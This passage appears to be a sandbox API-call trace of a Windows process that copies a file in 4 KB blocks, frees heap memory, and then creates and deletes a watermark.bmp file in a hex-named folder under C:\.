lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0082.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0082.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d7b0 [0082.096] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x570e0 [0082.096] GetLastError () returned 0x0 [0082.096] SetLastError (dwErrCode=0x0) [0082.096] GetLastError () returned 0x0 [0082.097] SetLastError (dwErrCode=0x0) [0082.097] GetLastError () returned 0x0 [0082.097] SetLastError (dwErrCode=0x0) [0082.097] GetLastError () returned 0x0 [0082.097] SetLastError (dwErrCode=0x0) [0082.097] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.097] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.098] GetLastError () returned 0x0 [0082.098] SetLastError (dwErrCode=0x0) [0082.098] GetLastError () returned 0x0 [0082.098] SetLastError (dwErrCode=0x0) [0082.099] GetLastError () returned 0x0 [0082.099] SetLastError (dwErrCode=0x0) [0082.099] GetLastError () returned 0x0 [0082.099] SetLastError (dwErrCode=0x0) [0082.099] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.099] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.099] GetLastError () returned 0x0 [0082.099] SetLastError (dwErrCode=0x0) [0082.099] GetLastError () returned 0x0 [0082.099] SetLastError (dwErrCode=0x0) [0082.099] GetLastError () returned 0x0 [0082.100] SetLastError (dwErrCode=0x0) [0082.100] GetLastError () returned 0x0 [0082.100] SetLastError (dwErrCode=0x0) [0082.100] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.100] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.100] GetLastError () returned 0x0 [0082.100] SetLastError (dwErrCode=0x0) [0082.100] GetLastError () returned 0x0 [0082.100] SetLastError (dwErrCode=0x0) [0082.100] GetLastError () returned 0x0 [0082.100] SetLastError (dwErrCode=0x0) [0082.100] GetLastError () returned 0x0 [0082.101] SetLastError (dwErrCode=0x0) [0082.101] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.101] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.101] GetLastError () returned 0x0 [0082.101] SetLastError (dwErrCode=0x0) [0082.101] GetLastError () returned 0x0 [0082.101] SetLastError (dwErrCode=0x0) [0082.101] GetLastError () returned 0x0 [0082.102] SetLastError (dwErrCode=0x0) [0082.102] GetLastError () returned 0x0 [0082.102] SetLastError (dwErrCode=0x0) [0082.102] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.102] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.102] GetLastError () returned 0x0 [0082.102] SetLastError (dwErrCode=0x0) [0082.102] GetLastError () returned 0x0 [0082.102] SetLastError (dwErrCode=0x0) [0082.102] GetLastError () returned 0x0 [0082.102] SetLastError (dwErrCode=0x0) [0082.102] GetLastError () returned 0x0 [0082.103] SetLastError (dwErrCode=0x0) [0082.103] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.103] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.103] GetLastError () returned 0x0 [0082.103] SetLastError (dwErrCode=0x0) [0082.103] GetLastError () returned 0x0 [0082.103] SetLastError (dwErrCode=0x0) [0082.103] GetLastError () returned 0x0 [0082.103] SetLastError (dwErrCode=0x0) [0082.103] GetLastError () returned 0x0 [0082.103] SetLastError (dwErrCode=0x0) [0082.103] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.104] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.104] GetLastError () returned 0x0 [0082.104] SetLastError (dwErrCode=0x0) [0082.104] GetLastError () returned 0x0 [0082.104] SetLastError (dwErrCode=0x0) [0082.104] GetLastError () returned 0x0 [0082.104] SetLastError (dwErrCode=0x0) [0082.104] GetLastError () returned 0x0 [0082.104] SetLastError (dwErrCode=0x0) [0082.104] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.104] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.105] GetLastError () returned 0x0 [0082.105] SetLastError (dwErrCode=0x0) [0082.105] GetLastError () returned 0x0 [0082.105] SetLastError (dwErrCode=0x0) [0082.105] GetLastError () returned 0x0 [0082.105] SetLastError (dwErrCode=0x0) [0082.105] GetLastError () returned 0x0 [0082.105] SetLastError (dwErrCode=0x0) [0082.105] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.105] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.106] GetLastError () returned 0x0 [0082.106] SetLastError (dwErrCode=0x0) [0082.106] GetLastError () returned 0x0 [0082.106] SetLastError (dwErrCode=0x0) [0082.106] GetLastError () returned 0x0 [0082.106] SetLastError (dwErrCode=0x0) [0082.106] GetLastError () returned 0x0 [0082.106] SetLastError (dwErrCode=0x0) [0082.106] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.106] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.106] GetLastError () returned 0x0 [0082.107] SetLastError (dwErrCode=0x0) [0082.107] GetLastError () returned 0x0 [0082.107] SetLastError (dwErrCode=0x0) [0082.107] GetLastError () returned 0x0 [0082.107] SetLastError (dwErrCode=0x0) [0082.107] GetLastError () returned 0x0 [0082.107] SetLastError (dwErrCode=0x0) [0082.107] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.107] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.107] GetLastError () returned 0x0 [0082.107] SetLastError (dwErrCode=0x0) [0082.107] GetLastError () returned 0x0 [0082.108] SetLastError (dwErrCode=0x0) [0082.108] GetLastError () returned 0x0 [0082.108] SetLastError (dwErrCode=0x0) [0082.108] GetLastError () returned 0x0 [0082.108] SetLastError (dwErrCode=0x0) [0082.108] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.108] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.108] GetLastError () returned 0x0 [0082.108] SetLastError (dwErrCode=0x0) [0082.108] GetLastError () returned 0x0 [0082.108] SetLastError (dwErrCode=0x0) [0082.109] GetLastError () returned 0x0 [0082.109] SetLastError (dwErrCode=0x0) [0082.109] GetLastError () returned 0x0 [0082.109] SetLastError (dwErrCode=0x0) [0082.109] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.109] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.109] GetLastError () returned 0x0 [0082.109] SetLastError (dwErrCode=0x0) [0082.109] GetLastError () returned 0x0 [0082.109] SetLastError (dwErrCode=0x0) [0082.109] GetLastError () returned 0x0 [0082.109] SetLastError (dwErrCode=0x0) [0082.109] GetLastError () returned 0x0 [0082.110] SetLastError (dwErrCode=0x0) [0082.110] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.110] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.110] GetLastError () returned 0x0 [0082.110] SetLastError (dwErrCode=0x0) [0082.110] GetLastError () returned 0x0 [0082.110] SetLastError (dwErrCode=0x0) [0082.110] GetLastError () returned 0x0 [0082.110] SetLastError (dwErrCode=0x0) [0082.110] GetLastError () returned 0x0 [0082.110] SetLastError (dwErrCode=0x0) [0082.110] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.111] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.111] GetLastError () returned 0x0 [0082.111] SetLastError (dwErrCode=0x0) [0082.111] GetLastError () returned 0x0 [0082.111] SetLastError (dwErrCode=0x0) [0082.111] GetLastError () returned 0x0 [0082.111] SetLastError (dwErrCode=0x0) [0082.111] GetLastError () returned 0x0 [0082.111] SetLastError (dwErrCode=0x0) [0082.111] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.111] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.112] GetLastError () returned 0x0 [0082.112] SetLastError (dwErrCode=0x0) [0082.112] GetLastError () returned 0x0 [0082.112] SetLastError (dwErrCode=0x0) [0082.112] GetLastError () returned 0x0 [0082.112] SetLastError (dwErrCode=0x0) [0082.112] GetLastError () returned 0x0 [0082.112] SetLastError (dwErrCode=0x0) [0082.112] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.112] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.113] GetLastError () returned 0x0 [0082.113] SetLastError (dwErrCode=0x0) [0082.113] GetLastError () returned 0x0 [0082.113] SetLastError (dwErrCode=0x0) [0082.113] GetLastError () returned 0x0 [0082.113] SetLastError (dwErrCode=0x0) [0082.113] GetLastError () returned 0x0 [0082.113] SetLastError (dwErrCode=0x0) [0082.113] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.113] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.113] GetLastError () returned 0x0 [0082.113] SetLastError (dwErrCode=0x0) [0082.114] GetLastError () returned 0x0 [0082.114] SetLastError (dwErrCode=0x0) [0082.114] GetLastError () returned 0x0 [0082.114] SetLastError (dwErrCode=0x0) [0082.114] GetLastError () returned 0x0 [0082.114] SetLastError (dwErrCode=0x0) [0082.114] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.114] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.114] GetLastError () returned 0x0 [0082.114] SetLastError (dwErrCode=0x0) [0082.114] GetLastError () returned 0x0 [0082.114] SetLastError (dwErrCode=0x0) [0082.115] GetLastError () returned 0x0 [0082.115] SetLastError (dwErrCode=0x0) [0082.115] GetLastError () returned 0x0 [0082.115] SetLastError (dwErrCode=0x0) [0082.115] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.115] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.115] GetLastError () returned 0x0 [0082.115] SetLastError (dwErrCode=0x0) [0082.115] GetLastError () returned 0x0 [0082.115] SetLastError (dwErrCode=0x0) [0082.115] GetLastError () returned 0x0 [0082.115] SetLastError (dwErrCode=0x0) [0082.116] GetLastError () returned 0x0 [0082.116] SetLastError (dwErrCode=0x0) [0082.116] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.116] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.116] GetLastError () returned 0x0 [0082.116] SetLastError (dwErrCode=0x0) [0082.116] GetLastError () returned 0x0 [0082.116] SetLastError (dwErrCode=0x0) [0082.116] GetLastError () returned 0x0 [0082.116] SetLastError (dwErrCode=0x0) [0082.116] GetLastError () returned 0x0 [0082.116] SetLastError (dwErrCode=0x0) [0082.116] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.117] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.117] GetLastError () returned 0x0 [0082.117] SetLastError (dwErrCode=0x0) [0082.117] GetLastError () returned 0x0 [0082.117] SetLastError (dwErrCode=0x0) [0082.117] GetLastError () returned 0x0 [0082.117] SetLastError (dwErrCode=0x0) [0082.117] GetLastError () returned 0x0 [0082.117] SetLastError (dwErrCode=0x0) [0082.117] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.118] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.118] GetLastError () returned 0x0 [0082.118] SetLastError (dwErrCode=0x0) [0082.118] GetLastError () returned 0x0 [0082.118] SetLastError (dwErrCode=0x0) [0082.118] GetLastError () returned 0x0 [0082.118] SetLastError (dwErrCode=0x0) [0082.118] GetLastError () returned 0x0 [0082.118] SetLastError (dwErrCode=0x0) [0082.118] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0082.118] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.119] GetLastError () returned 0x0 [0082.119] SetLastError (dwErrCode=0x0) [0082.119] GetLastError () returned 0x0 [0082.119] SetLastError (dwErrCode=0x0) [0082.119] GetLastError () returned 0x0 [0082.119] SetLastError (dwErrCode=0x0) [0082.119] SetLastError (dwErrCode=0x0) [0082.119] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x688, lpOverlapped=0x0) returned 1 [0082.119] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0082.119] SetLastError (dwErrCode=0x0) [0082.119] ReadFile (in: hFile=0x428, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0082.119] SetLastError (dwErrCode=0x0) [0082.119] SetLastError (dwErrCode=0x0) [0082.120] WriteFile (in: hFile=0x430, lpBuffer=0x570e0*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x570e0*, lpNumberOfBytesWritten=0x327ef70*=0x690, lpOverlapped=0x0) returned 1 [0082.120] SetLastError (dwErrCode=0x0) [0082.120] SetLastError (dwErrCode=0x0) [0082.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0082.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5a0 | out: hHeap=0x20000) returned 1 [0082.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.120] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0082.120] CloseHandle (hObject=0x430) returned 1 [0082.123] CloseHandle (hObject=0x428) returned 1 [0082.123] AreFileApisANSI () returned 1 [0082.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0082.123] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0082.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0082.123] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.125] GetFileType (hFile=0x428) returned 0x1 [0082.125] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0082.125] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0082.125] GetLastError () returned 0xb7 [0082.125] SetLastError (dwErrCode=0xb7) [0082.125] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0082.126] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0082.126] CloseHandle (hObject=0x428) returned 1 [0082.126] AreFileApisANSI () returned 1 [0082.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0082.126] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0082.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\watermark.bmp") returned 36 [0082.126] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\watermark.bmp" (normalized: "c:\\588bce7c90097ed212\\watermark.bmp")) returned 1 [0082.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0082.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0082.127] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d5d0 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 